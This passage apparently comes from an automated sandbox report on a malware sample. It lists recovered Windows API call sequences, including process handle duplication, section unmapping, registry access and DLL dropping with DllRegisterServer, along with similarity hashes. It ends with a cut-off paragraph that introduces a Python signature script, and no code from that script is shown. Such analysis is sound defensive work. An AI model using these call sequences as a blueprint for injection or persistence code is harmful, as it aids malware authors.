  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
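The "API ID" line in each Similarity block above is a signature built from the function's own API calls (the indented "Part of subcall function" lines are not counted), which is what the "Total matches" count is keyed on. As an added example, not part of the Joe Sandbox report, the following Python recomputes that signature from the listing text so the same grouping can be applied to other reports or used to cluster functions across samples. The excerpts are copied from the record above and from a later record on this page (with one subcall line added to show it is skipped); the grouping rule it implements (A/W suffix dropped, names grouped by call count, groups in descending count order joined with `$`, names within a group in ASCII order) is inferred from the records on this page rather than documented by the vendor, and the numeric "API String ID" is not reproduced because its hash function is not shown here. `REPORT_EXCERPT`, 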